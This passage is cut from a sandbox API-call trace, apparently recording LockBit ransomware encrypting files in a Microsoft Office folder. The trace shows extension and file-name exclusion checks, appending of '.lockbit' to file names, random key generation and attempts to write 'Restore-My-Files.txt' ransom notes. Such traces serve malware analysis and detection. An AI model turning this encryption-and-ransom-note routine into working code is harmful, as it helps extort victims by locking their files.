lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.268] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.268] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF.lockbit") returned 78 [0204.268] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21331_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.270] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.270] malloc (_Size=0x40068) returned 0x3df0008 [0204.270] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1120) returned 1 [0204.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.271] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.328] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.328] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.328] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.328] free (_Block=0x1fa2ed8) [0204.328] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.328] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.328] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.328] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d82300, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdc8c40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x20d82300, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21333_.GIF", cAlternateFileName="")) returned 1 [0204.328] lstrcmpiW (lpString1=".", lpString2="BD21333_.GIF") returned -1 [0204.328] lstrcmpiW (lpString1="..", lpString2="BD21333_.GIF") returned -1 [0204.328] PathFindExtensionW (pszPath="BD21333_.GIF") returned=".GIF" [0204.328] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.328] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.328] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.328] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.328] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.329] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.329] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.330] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21333_.GIF") returned 1 [0204.330] lstrcmpiW (lpString1="ntldr", lpString2="BD21333_.GIF") returned 1 [0204.330] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21333_.GIF") returned 1 [0204.330] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21333_.GIF") returned 1 [0204.330] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21333_.GIF") returned -1 [0204.330] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21333_.GIF") returned 1 [0204.330] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21333_.GIF") returned 1 [0204.330] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.330] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF") returned=".GIF" [0204.330] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.330] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.331] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.331] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.331] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF.lockbit") returned 78 [0204.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21333_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.333] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.333] malloc (_Size=0x40068) returned 0x3df0008 [0204.333] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=416) returned 1 [0204.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.335] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.339] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.339] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.339] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.339] free (_Block=0x1fa2ed8) [0204.339] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.339] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.339] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.340] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d449c00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdeeda0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1d449c00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x3cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21335_.GIF", cAlternateFileName="")) returned 1 [0204.340] lstrcmpiW (lpString1=".", lpString2="BD21335_.GIF") returned -1 [0204.340] lstrcmpiW (lpString1="..", lpString2="BD21335_.GIF") returned -1 [0204.340] PathFindExtensionW (pszPath="BD21335_.GIF") returned=".GIF" [0204.340] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.340] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.340] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.341] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.341] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.341] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.341] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.341] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.341] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21335_.GIF") returned 1 [0204.342] lstrcmpiW (lpString1="ntldr", lpString2="BD21335_.GIF") returned 1 [0204.342] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21335_.GIF") returned 1 [0204.342] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21335_.GIF") returned 1 [0204.342] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21335_.GIF") returned -1 [0204.342] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21335_.GIF") returned 1 [0204.342] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21335_.GIF") returned 1 [0204.342] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.342] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF") returned=".GIF" [0204.342] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.342] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.342] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.342] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.342] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.342] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.342] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.343] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.343] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF.lockbit") returned 78 [0204.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21335_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.345] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.345] malloc (_Size=0x40068) returned 0x3df0008 [0204.345] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=971) returned 1 [0204.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.347] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.443] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.443] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.443] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.443] free (_Block=0x1fa2ed8) [0204.443] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.443] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.443] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c136f00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdeeda0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1c136f00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21337_.GIF", cAlternateFileName="")) returned 1 [0204.443] lstrcmpiW (lpString1=".", lpString2="BD21337_.GIF") returned -1 [0204.443] lstrcmpiW (lpString1="..", lpString2="BD21337_.GIF") returned -1 [0204.444] PathFindExtensionW (pszPath="BD21337_.GIF") returned=".GIF" [0204.444] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.444] lstrcmpiW (lpString1=".adv", 